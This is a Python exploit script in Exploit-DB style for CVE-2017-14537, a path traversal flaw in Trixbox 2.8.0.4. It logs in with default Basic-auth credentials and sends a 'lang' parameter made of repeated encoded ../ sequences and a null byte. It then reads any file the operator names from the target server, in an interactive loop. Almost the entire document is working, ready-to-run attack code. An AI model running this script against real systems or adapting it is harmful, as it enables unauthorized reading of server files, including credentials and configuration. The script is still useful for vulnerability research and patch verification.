# Exploit Title: Trixbox 2.8.0.4 - 'lang' Path Traversal # Date: 27.05.2021 # Exploit Author: Ron Jost (Hacker5preme) # Credits to: https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ # Credits to: Sachin Wagh # Vendor Homepage: https://sourceforge.net/projects/asteriskathome/ # Software Link: https://sourceforge.net/projects/asteriskathome/files/trixbox%20CE/trixbox%202.8/trixbox-2.8.0.4.iso/download # Version: 2.8.0.4 # Tested on: Xubuntu 20.04 # CVE: CVE-2017-14537 ''' Description: trixbox 2.8.0.4 has path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php. ''' ''' Import required modules: ''' import requests import sys import urllib.parse ''' User-Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] ''' Construct malicious request: ''' # Constructing header: header = { 'Host': target_ip, 'User-Agent': 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Cookie': 'template=classic; lng=en; lng=en', 'Upgrade-Insecure-Requests': '1', 'Authorization': 'Basic bWFpbnQ6cGFzc3dvcmQ=', } # Constructing malicious link (payload): base_link = 'http://' + target_ip + ':' + target_port base_link_addon_1 = '/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..' base_link_addon_3 = '%00english' print('') base_link_addon_2 = input('Input the filepath or input EXIT: ') ''' EXPLOIT: ''' while base_link_addon_2 != 'EXIT': base_link_addon_2_coded = urllib.parse.quote(base_link_addon_2, safe='') exploit_link = base_link + base_link_addon_1 + base_link_addon_2_coded + base_link_addon_3 print('') exploit = requests.post(exploit_link, headers=header) print('Contents of ' + base_link_addon_2 + ':') for data in exploit.iter_lines(): data = data.decode('utf-8') if data != '': print(data) else: break print('') base_link_addon_2 = input('Input the filepath or input EXIT: ')